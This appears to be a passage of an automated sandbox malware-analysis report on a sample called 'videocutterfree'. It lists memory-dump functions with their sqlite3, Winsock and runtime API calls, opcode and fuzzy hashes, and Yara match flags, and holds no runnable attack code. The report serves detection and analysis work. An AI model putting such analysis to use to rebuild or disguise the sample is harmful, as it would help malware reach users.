                                                                              • Instruction Fuzzy Hash: 5D51AE716043458BDB21DF28C888B9AB7E8BF8A328F194619FC6997291D735EC05CBD1
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                              • String ID:
                                                                              • API String ID: 2782032738-0
                                                                              • Opcode ID: c6e751584019fe7e8b02fdb2d017c5892803be91544b6d950ba89984b09a2191
                                                                              • Instruction ID: 23431df6680ab4b225c81fecc65fbb3dfd5fbfdddbbeda8bad311db777a25596
                                                                              • Opcode Fuzzy Hash: c6e751584019fe7e8b02fdb2d017c5892803be91544b6d950ba89984b09a2191
                                                                              • Instruction Fuzzy Hash: 46418371A057069BDF1C8FADC8906AE77B9EF86360B24853EF855C7240EA70DD419BD0
                                                                              APIs
                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009AECFB
                                                                              • __isleadbyte_l.LIBCMT ref: 009AED29
                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000108,?,00000000,00000000), ref: 009AED57
                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000108,00000001,00000000,00000000), ref: 009AED8D
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                              • String ID:
                                                                              • API String ID: 3058430110-0
                                                                              • Opcode ID: 2690cc833af29d1c05921d49545d687a974c34e42ffeff93195e6a7896a19b3c
                                                                              • Instruction ID: c01ff5e66177998c6cbc440f8cdcbb26c0431b83dcec892b563352d824d13d29
                                                                              • Opcode Fuzzy Hash: 2690cc833af29d1c05921d49545d687a974c34e42ffeff93195e6a7896a19b3c
                                                                              • Instruction Fuzzy Hash: 45318D31604296AFDB219E75CC44BBA7BB9FF82320F154529F8648B1E1E730E990DBD0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_freesqlite3_mallocsqlite3_value_bytessqlite3_value_text
                                                                              • String ID:
                                                                              • API String ID: 1648232842-0
                                                                              • Opcode ID: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                              • Instruction ID: a01add595a6c287de5924383f0ed77e5cc34082cd65fcd393cbe5beac3228527
                                                                              • Opcode Fuzzy Hash: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                              • Instruction Fuzzy Hash: 4531C0B4A042058FDB04DF29C094B5ABBE2FF98354F1484A9EC498F349D779E846CBA0
                                                                              APIs
                                                                              • sqlite3_step.SQLITE3 ref: 609614AB
                                                                              • sqlite3_reset.SQLITE3 ref: 609614BF
                                                                                • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                              • sqlite3_column_int64.SQLITE3 ref: 609614D4
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_column_int64sqlite3_mutex_entersqlite3_mutex_leavesqlite3_resetsqlite3_step
                                                                              • String ID:
                                                                              • API String ID: 3429445273-0
                                                                              • Opcode ID: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                              • Instruction ID: 62863439de2fabb71fd3664abc4fbfc11ff04353a6e6e3e42574d1c19fb7889d
                                                                              • Opcode Fuzzy Hash: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                              • Instruction Fuzzy Hash: AE316470A183408BEF15CF69C1C5749FBA6AFA7348F188599DC864F30AD375D884C752
                                                                              APIs
                                                                              • htons.WS2_32(?), ref: 00993DA2
                                                                                • Part of subcall function 00993BD3: __EH_prolog.LIBCMT ref: 00993BD8
                                                                                • Part of subcall function 00993BD3: std::bad_exception::bad_exception.LIBCMT ref: 00993BED
                                                                              • htonl.WS2_32(00000000), ref: 00993DB9
                                                                              • htonl.WS2_32(00000000), ref: 00993DC0
                                                                              • htons.WS2_32(?), ref: 00993DD4
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                                              • String ID:
                                                                              • API String ID: 3882411702-0
                                                                              • Opcode ID: 72798e6e07424c6cfd52fc5155d1368cf78c711f8c1a415bfdd7b605eb1dd1fc
                                                                              • Instruction ID: 650511a6c823edef335a2c74f6c577cde12f3289a802c3d5bc78c314c02cd88f
                                                                              • Opcode Fuzzy Hash: 72798e6e07424c6cfd52fc5155d1368cf78c711f8c1a415bfdd7b605eb1dd1fc
                                                                              • Instruction Fuzzy Hash: 6D11CE36614208EFCF009FA8D985A6AB7B8EF08320F00C05AFC04DF252E671EA04D7A1
                                                                              APIs
                                                                              • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 609034D8
                                                                              • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903521
                                                                              • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 6090354A
                                                                              • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903563
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                              • String ID:
                                                                              • API String ID: 1477753154-0
                                                                              • Opcode ID: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                              • Instruction ID: 848dca46e936c6e01d33e08870ae11aa620bd8b24bdb606da7ea596206f2e213
                                                                              • Opcode Fuzzy Hash: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                              • Instruction Fuzzy Hash: 44111F726186218FDB00EF7DC8817597FEAFB66308F00842DE865E7362E779D8819741
                                                                              APIs
                                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 009923D0
                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 009923DE
                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 00992401
                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 00992408
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                              • String ID:
                                                                              • API String ID: 4018804020-0
                                                                              • Opcode ID: d8616f0d76c9889a9caf20b99a50fbaacde41e78c56c36b5af666d5253b71a80
                                                                              • Instruction ID: 2843f171ee0d5606127ec4d561fe13bcf39f4e25db9af588fa1f12cf3fa6c714
                                                                              • Opcode Fuzzy Hash: d8616f0d76c9889a9caf20b99a50fbaacde41e78c56c36b5af666d5253b71a80
                                                                              • Instruction Fuzzy Hash: CE11CE32610204ABEB10EF6AD985B6AB7B8FF50714F10406DF9019A150D7BAFC01DBA0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                              • String ID:
                                                                              • API String ID: 3016257755-0
                                                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                              • Instruction ID: 3d7f7d81f1c6105c5c70c2801a6af1ff0b7c9694b9ffd7556bd2ad074738bab6
                                                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                              • Instruction Fuzzy Hash: AE01497200018EBBCF166E84CC55DEE3F36BB1A364B598915FE2859032D336C9B1AB81
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_value_text$sqlite3_freesqlite3_load_extension
                                                                              • String ID:
                                                                              • API String ID: 3526213481-0
                                                                              • Opcode ID: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                              • Instruction ID: 98199466554994e62e20ad809be6129e3c08b78dd6d8c38fc18f61524e73aad2
                                                                              • Opcode Fuzzy Hash: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                              • Instruction Fuzzy Hash: 4101E9B5A043059BCB00EF69D485AAFBBF5EF68654F10C529EC9497304E774D841CF91
                                                                              APIs
                                                                              • sqlite3_prepare.SQLITE3 ref: 60969166
                                                                              • sqlite3_errmsg.SQLITE3 ref: 60969172
                                                                                • Part of subcall function 609258A8: sqlite3_log.SQLITE3 ref: 609258E5
                                                                              • sqlite3_errcode.SQLITE3 ref: 6096918A
                                                                                • Part of subcall function 609251AA: sqlite3_log.SQLITE3 ref: 609251E8
                                                                              • sqlite3_step.SQLITE3 ref: 60969197
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_log$sqlite3_errcodesqlite3_errmsgsqlite3_preparesqlite3_step
                                                                              • String ID:
                                                                              • API String ID: 2877408194-0
                                                                              • Opcode ID: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                              • Instruction ID: d4ebd4c9a05a553e526e78eaaf80584f3afcfe73b3175c4c6dada352db343273
                                                                              • Opcode Fuzzy Hash: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                              • Instruction Fuzzy Hash: 9F0186B091C3059BE700EF29C88525DFBE9EFA5314F11892DA89987384E734C940CB86
                                                                              APIs
                                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 009924A9
                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 009924B8
                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 009924CD
                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 009924D4
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                              • String ID:
                                                                              • API String ID: 4018804020-0
                                                                              • Opcode ID: 1a4ae14514d579dbb970edb5197c120a9e9e07e6d65eb4205ffde8d27d8cb92a
                                                                              • Instruction ID: 9924d45b242017e2e9f871fb73b2e51771b427bb57998db7c57ceeed03806f65
                                                                              • Opcode Fuzzy Hash: 1a4ae14514d579dbb970edb5197c120a9e9e07e6d65eb4205ffde8d27d8cb92a
                                                                              • Instruction Fuzzy Hash: B3F03C72110204AFDB00AF6AED49F9ABBACFF45720F008129FA05C6151D775F9508BA0
                                                                              APIs
                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 609084E9
                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 60908518
                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 60908528
                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 6090855B
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                              • String ID:
                                                                              • API String ID: 1477753154-0
                                                                              • Opcode ID: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                                              • Instruction ID: c41a4d3f3efa942db11cbd34a9101edfe28f26dd6f673ba1da0d5803e4a0adbd
                                                                              • Opcode Fuzzy Hash: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                                              • Instruction Fuzzy Hash: FD01A4B05093048BDB40AF25C5D97CABBA5EF15718F0884BDEC894F34AD7B9D5448BA1
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00992009
                                                                              • RtlDeleteCriticalSection.NTDLL(?), ref: 00992028
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00992037
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0099204E
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                                              • String ID:
                                                                              • API String ID: 2456309408-0
                                                                              • Opcode ID: 64bdd9458e2c0b7ce0713510d92c06f598ed519a2c2bc87349ea5feb041fb656
                                                                              • Instruction ID: a90fdee795e25a8bdcbb652f54d5a6ae3adc237c4ae907903cf57924b636ab92
                                                                              • Opcode Fuzzy Hash: 64bdd9458e2c0b7ce0713510d92c06f598ed519a2c2bc87349ea5feb041fb656
                                                                              • Instruction Fuzzy Hash: B101F471404704DFCB34AF19E9087AAB7F8FF44314F044A1DF446826A0C7747944CB51
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Event$H_prologSleep
                                                                              • String ID:
                                                                              • API String ID: 1765829285-0
                                                                              • Opcode ID: 18f6574925515fcf22b9b48264f3957e22c61d5e5e496e5071a2b9b412d2ee7c
                                                                              • Instruction ID: e3c6709435f9e8ecd736dd2a8054a17545c0f94d2581bcb7e7277fc76fc2cc9f
                                                                              • Opcode Fuzzy Hash: 18f6574925515fcf22b9b48264f3957e22c61d5e5e496e5071a2b9b412d2ee7c
                                                                              • Instruction Fuzzy Hash: 0CF05E36614114EFCB00AF99DDC8B88BBB4FF0D321F0082A9FA19DB291C734A844DB61
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_log
                                                                              • String ID: into$out of
                                                                              • API String ID: 632333372-1114767565
                                                                              • Opcode ID: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                              • Instruction ID: de20b162988cb891a2f8fbcf22309076e3e21d241eadb06c465d82de9f0e8d92
                                                                              • Opcode Fuzzy Hash: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                              • Instruction Fuzzy Hash: 91910170A043149BDB26CF28C88175EBBBABF65308F0481E9E858AB355D7B5DE85CF41
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog_memmove
                                                                              • String ID: &'
                                                                              • API String ID: 3529519853-655172784
                                                                              • Opcode ID: c918b00d55b9cfdbd4311d463aeaca6b441a71fa30d10462a3852f9050df95f1
                                                                              • Instruction ID: 3b40f138eb48c217a55019f2445c21869489c16cd798437d48b27f2fb3d85259
                                                                              • Opcode Fuzzy Hash: c918b00d55b9cfdbd4311d463aeaca6b441a71fa30d10462a3852f9050df95f1
                                                                              • Instruction Fuzzy Hash: A0619071D00209DBDF20EFA8C981BEEFBB9AF95310F10816EE505BB191DB705A45CB61
                                                                              APIs
                                                                                • Part of subcall function 60918408: sqlite3_value_text.SQLITE3 ref: 60918426
                                                                              • sqlite3_free.SQLITE3 ref: 609193A3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_freesqlite3_value_text
                                                                              • String ID: (NULL)$NULL
                                                                              • API String ID: 2175239460-873412390
                                                                              • Opcode ID: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                                              • Instruction ID: 63658e955800b40111a930d2026d12727b3b294c4be858d68b3f7c51d7abf176
                                                                              • Opcode Fuzzy Hash: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                                              • Instruction Fuzzy Hash: E3514B31F0825A8EEB258A68C89479DBBB6BF66304F1441E9C4A9AB241D7309DC6CF01
                                                                              APIs
                                                                              • GetCPInfo.KERNEL32(?,00000000), ref: 004050C1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: Info
                                                                              • String ID: $
                                                                              • API String ID: 1807457897-3032137957
                                                                              • Opcode ID: cd88601ac4690f7c3bf36e0dd2dda664ed615bbaf1acac2202640a2d4584269f
                                                                              • Instruction ID: 195c675fc4e5f590e83e978609f8c0d81ce532fbad917a7cc75260899aa7fe4e
                                                                              • Opcode Fuzzy Hash: cd88601ac4690f7c3bf36e0dd2dda664ed615bbaf1acac2202640a2d4584269f
                                                                              • Instruction Fuzzy Hash: 1D4147318047582AEB119714ED49BFB3FA8EB02704F1404F6E945FA1D3C2794918DFAB
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_log
                                                                              • String ID: string or blob too big$|
                                                                              • API String ID: 632333372-330586046
                                                                              • Opcode ID: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                                              • Instruction ID: 65a9847582dc10a4f4f17f1c4fc8d82f10366072c52f03016cacc5a11d353e3e
                                                                              • Opcode Fuzzy Hash: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                                              • Instruction Fuzzy Hash: 4D51B9749083689BCB22CF28C985789BBF6BF59314F1086D9E49897351C775EE81CF41
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
Similarity
• API ID: sqlite3_logsqlite3_value_text
• String ID: string or blob too big
• API String ID: 2320820228-2803948771
• Opcode ID: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
• Instruction ID: 1f8da1134a73d261049fdcd83983d84c916c8a3f87851362e697cdb17b1d2bab
• Opcode Fuzzy Hash: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
• Instruction Fuzzy Hash: F631D9B0A083249BCB25DF28C881799B7FABF69304F0085DAE898A7301D775DE81CF45
APIs
• WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,00997182,?,?,00000000), ref: 0099847F
• getsockname.WS2_32(?,?,?), ref: 00998495
Strings
Memory Dump Source
• Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
Yara matches
Similarity
• API ID: ErrorLastgetsockname
• String ID: &'
• API String ID: 566540725-655172784
• Opcode ID: 32913b9d91235a8e9199aa0286960388572c32e8dc8971afd0e84bf35e1367f5
• Instruction ID: 203dd814bd0dfaade2f035e1a77da1ed9be835a2af2946654a7ea8b2216edf90
• Opcode Fuzzy Hash: 32913b9d91235a8e9199aa0286960388572c32e8dc8971afd0e84bf35e1367f5
• Instruction Fuzzy Hash: 19219272A00209EBDF10DFACD845ACFB7F5FF48324F10856AE919EB291DB34A9058750
APIs
• __EH_prolog.LIBCMT ref: 0099BA63
